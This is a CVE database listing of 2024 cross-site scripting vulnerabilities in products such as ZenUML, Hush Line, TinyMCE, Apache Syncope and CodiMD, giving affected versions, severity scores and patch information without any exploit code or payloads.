Total
30576 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2024-38527 | 2024-11-21 | N/A | 5.4 MEDIUM | ||
| ZenUML is JavaScript-based diagramming tool that requires no server, using Markdown-inspired text definitions and a renderer to create and modify sequence diagrams. Markdown-based comments in the ZenUML diagram syntax are susceptible to Cross-site Scripting (XSS). The comment feature allows the user to attach small notes for reference. This feature allows the user to enter in their comment in markdown comment, allowing them to use common markdown features, such as `**` for bolded text. However, the markdown text is currently not sanitized before rendering, allowing an attacker to enter a malicious payload for the comment which leads to XSS. This puts existing applications that use ZenUML unsandboxed at risk of arbitrary JavaScript execution when rendering user-controlled diagrams. This vulnerability was patched in version 3.23.25, | |||||
| CVE-2024-38521 | 1 Hushline | 1 Hush Line | 2024-11-21 | N/A | 8.8 HIGH |
| Hush Line is a free and open-source, anonymous-tip-line-as-a-service for organizations or individuals. There is a stored XSS in the Inbox. The input is displayed using the `safe` Jinja2 attribute, and thus not sanitized upon display. This issue has been patched in version 0.1.0. | |||||
| CVE-2024-38507 | 1 Jetbrains | 1 Hub | 2024-11-21 | N/A | 3.5 LOW |
| In JetBrains Hub before 2024.2.34646 stored XSS via project description was possible | |||||
| CVE-2024-38503 | 1 Apache | 1 Syncope | 2024-11-21 | N/A | 5.4 MEDIUM |
| When editing a user, group or any object in the Syncope Console, HTML tags could be added to any text field and could lead to potential exploits. The same vulnerability was found in the Syncope Enduser, when editing “Personal Information” or “User Requests”. Users are recommended to upgrade to version 3.0.8, which fixes this issue. | |||||
| CVE-2024-38493 | 1 Broadcom | 1 Symantec Privileged Access Management | 2024-11-21 | N/A | 6.1 MEDIUM |
| A reflected cross-site scripting (XSS) vulnerability exists in the PAM UI web interface. A remote attacker able to convince a PAM user to click on a specially crafted link to the PAM UI web interface could potentially execute arbitrary client-side code in the context of PAM UI. | |||||
| CVE-2024-38470 | 2024-11-21 | N/A | 6.1 MEDIUM | ||
| zhimengzhe iBarn v1.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the $search parameter at /own.php. | |||||
| CVE-2024-38454 | 1 Expressionengine | 1 Expressionengine | 2024-11-21 | N/A | 6.1 MEDIUM |
| ExpressionEngine before 7.4.11 allows XSS. | |||||
| CVE-2024-38436 | 1 Commugen | 1 Sox 365 | 2024-11-21 | N/A | 6.1 MEDIUM |
| Commugen SOX 365 – CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | |||||
| CVE-2024-38430 | 1 Matrix-globalservices | 1 Tafnit | 2024-11-21 | N/A | 5.4 MEDIUM |
| Matrix - CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') | |||||
| CVE-2024-38379 | 1 Apache | 1 Allura | 2024-11-21 | N/A | 4.8 MEDIUM |
| Apache Allura's neighborhood settings are vulnerable to a stored XSS attack. Only neighborhood admins can access these settings, so the scope of risk is limited to configurations where neighborhood admins are not fully trusted. This issue affects Apache Allura: from 1.4.0 through 1.17.0. Users are recommended to upgrade to version 1.17.1, which fixes the issue. | |||||
| CVE-2024-38364 | 2024-11-21 | N/A | 2.6 LOW | ||
| DSpace is an open source software is a turnkey repository application used by more than 2,000 organizations and institutions worldwide to provide durable access to digital resources. In DSpace 7.0 through 7.6.1, when an HTML, XML or JavaScript Bitstream is downloaded, the user's browser may execute any embedded JavaScript. If that embedded JavaScript is malicious, there is a risk of an XSS attack. This vulnerability has been patched in version 7.6.2. | |||||
| CVE-2024-38357 | 2024-11-21 | N/A | 6.1 MEDIUM | ||
| TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content parsing code. This allowed specially crafted noscript elements containing malicious code to be executed when that content was loaded into the editor. This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that content within noscript elements are properly parsed. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |||||
| CVE-2024-38356 | 2024-11-21 | N/A | 6.1 MEDIUM | ||
| TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE’s content extraction code. When using the `noneditable_regexp` option, specially crafted HTML attributes containing malicious code were able to be executed when content was extracted from the editor. This vulnerability has been patched in TinyMCE 7.2.0, TinyMCE 6.8.4 and TinyMCE 5.11.0 LTS by ensuring that, when using the `noneditable_regexp` option, any content within an attribute is properly verified to match the configured regular expression before being added. Users are advised to upgrade. There are no known workarounds for this vulnerability. | |||||
| CVE-2024-38354 | 1 Hackmd | 1 Codimd | 2024-11-21 | N/A | 8.1 HIGH |
| CodiMD allows realtime collaborative markdown notes on all platforms. The notebook feature of Hackmd.io permits the rendering of iframe `HTML` tags with an improperly sanitized `name` attribute. This vulnerability enables attackers to perform cross-site scripting (XSS) attacks via DOM clobbering. This vulnerability is fixed in 2.5.4. | |||||
| CVE-2024-38274 | 2024-11-21 | N/A | 6.1 MEDIUM | ||
| Insufficient escaping of calendar event titles resulted in a stored XSS risk in the event deletion prompt. | |||||
| CVE-2024-38156 | 1 Microsoft | 1 Edge | 2024-11-21 | N/A | 6.1 MEDIUM |
| Microsoft Edge (Chromium-based) Spoofing Vulnerability | |||||
| CVE-2024-37961 | 2024-11-21 | N/A | 7.1 HIGH | ||
| Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in codoc.Jp allows Stored XSS.This issue affects codoc: from n/a through 0.9.51.12. | |||||
| CVE-2024-37960 | 2024-11-21 | N/A | 6.5 MEDIUM | ||
| Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Chris Coyier CodePen Embedded Pens Shortcode allows Stored XSS.This issue affects CodePen Embedded Pens Shortcode: from n/a through 1.0.0. | |||||
| CVE-2024-37959 | 1 Atlaspolicy | 1 Power Bi Embedded | 2024-11-21 | N/A | 6.5 MEDIUM |
| Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Atlas Public Policy Power BI Embedded for WordPress allows Stored XSS.This issue affects Power BI Embedded for WordPress: from n/a through 1.1.7. | |||||
| CVE-2024-37958 | 1 Mekshq | 1 Meks Smart Author Widget | 2024-11-21 | N/A | 6.5 MEDIUM |
| Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Meks Meks Smart Author Widget allows Stored XSS.This issue affects Meks Smart Author Widget: from n/a through 1.1.4. | |||||